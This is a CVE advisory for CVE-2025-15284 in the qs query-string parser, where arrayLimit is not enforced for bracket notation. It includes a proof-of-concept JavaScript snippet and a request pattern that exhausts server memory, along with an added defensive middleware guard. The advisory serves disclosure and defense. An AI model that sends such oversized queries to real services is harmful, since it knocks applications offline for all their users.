
CVE

CVE-2025-15284


Improper Input Validation vulnerability in qs (parse modules) allows HTTP DoS. This issue affects qs: < 6.14.1.

Summary

The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.

Details

The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).

Vulnerable code (lib/parse.js:159-162):

    if (root === '[]' && options.parseArrays) {
        obj = utils.combine([], leaf);  // No arrayLimit check
    }

Working code (lib/parse.js:175):

    else if (index <= options.arrayLimit) {  // Limit checked here
        obj = [];
        obj[index] = leaf;
    }

The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.

PoC

Test 1 - Basic bypass:

    npm install qs

    const qs = require('qs');
    const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
    console.log(result.a.length);  // Output: 6 (should be max 5)

Test 2 - DoS demonstration:

    const qs = require('qs');
    const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
    const result = qs.parse(attack, { arrayLimit: 100 });
    console.log(result.a.length);  // Output: 10000 (should be max 100)

Configuration:

  •  arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
  •  Use bracket notation: a[]=value (not indexed a[0]=value)

Impact

Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.

Attack scenario:

  •  Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
  •  Application parses with qs.parse(query, { arrayLimit: 100 })
  •  qs ignores limit, parses all 100,000 elements into array
  •  Server memory exhausted → application crashes or becomes unresponsive
  •  Service unavailable for all users

Real-world impact:

  •  Single malicious request can crash server
  •  No authentication required
  •  Easy to automate and scale
  •  Affects any endpoint parsing query strings with bracket notation
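Until the upgrade to qs 6.14.1 is applied, a defender can count bracket-notation array members in the raw query string and reject oversized requests before qs.parse allocates anything. This is an added example, not code from qs or the advisory; the limits, the function names, the key regex and the Express-style middleware shape are assumptions.

```javascript
// Added example (not qs or advisory code): pre-parse guard that counts
// `key[]` members per root key so a request over the limit is rejected
// before qs.parse runs. Limits and names below are assumptions.
const ARRAY_LIMIT = 100;   // same value the page's Test 2 passes to qs
const PARAM_LIMIT = 1000;  // cap on total key=value pairs (assumed)

// qs decodes keys, so `a%5B%5D=` is the same as `a[]=`; decode before
// matching or an encoded key would slip past the guard.
function decodeKey(raw) {
  try {
    return decodeURIComponent(raw.replace(/\+/g, ' '));
  } catch (e) {
    return raw;  // malformed escape: keep as-is
  }
}

// Returns { ok: true } or { ok: false, reason, key, count }.
function checkArrayLimits(query, arrayLimit = ARRAY_LIMIT, paramLimit = PARAM_LIMIT) {
  const counts = new Map();
  let params = 0;
  for (const part of query.split('&')) {
    if (part === '') continue;
    if (++params > paramLimit) {
      return { ok: false, reason: 'parameterLimit', key: null, count: params };
    }
    const eq = part.indexOf('=');
    const key = decodeKey(eq === -1 ? part : part.slice(0, eq));
    // `root[]` or `root[][child]`: the leading empty bracket pair is what
    // qs turns into an array push. Indexed `root[0]` is left to qs, which
    // already enforces arrayLimit for it.
    const m = /^([^\[]+)\[\]/.exec(key);
    if (!m) continue;
    const root = m[1];
    const n = (counts.get(root) || 0) + 1;
    counts.set(root, n);
    if (n > arrayLimit) {
      return { ok: false, reason: 'arrayLimit', key: root, count: n };
    }
  }
  return { ok: true };
}

// Express-style middleware (assumed shape): answer 413 instead of parsing.
function arrayLimitGuard(req, res, next) {
  const idx = req.url.indexOf('?');
  const verdict = checkArrayLimits(idx === -1 ? '' : req.url.slice(idx + 1));
  if (!verdict.ok) return res.status(413).send('query exceeds ' + verdict.reason);
  next();
}
```

The guard is a pessimistic upper bound on what qs would build; it does not replace the upgrade, which fixes the limit inside the parser itself.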


CVSS

Base Score: 8.7 (High under CVSS 4.0)
CVSS Version: 4.0
Score Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X


References

https://github.com/ljharb/qs/security/advisories/GHSA-6rw7-vpxm-498p
https://github.com/ljharb/qs/commit/3086902ecf7f088d0d1803887643ac6c03d415b9


Basic Information

EPSS Probability: 0.00152%
EPSS Percentile: 0.36189%
Fix Available: commit 3086902ecf7f088d0d1803887643ac6c03d415b9
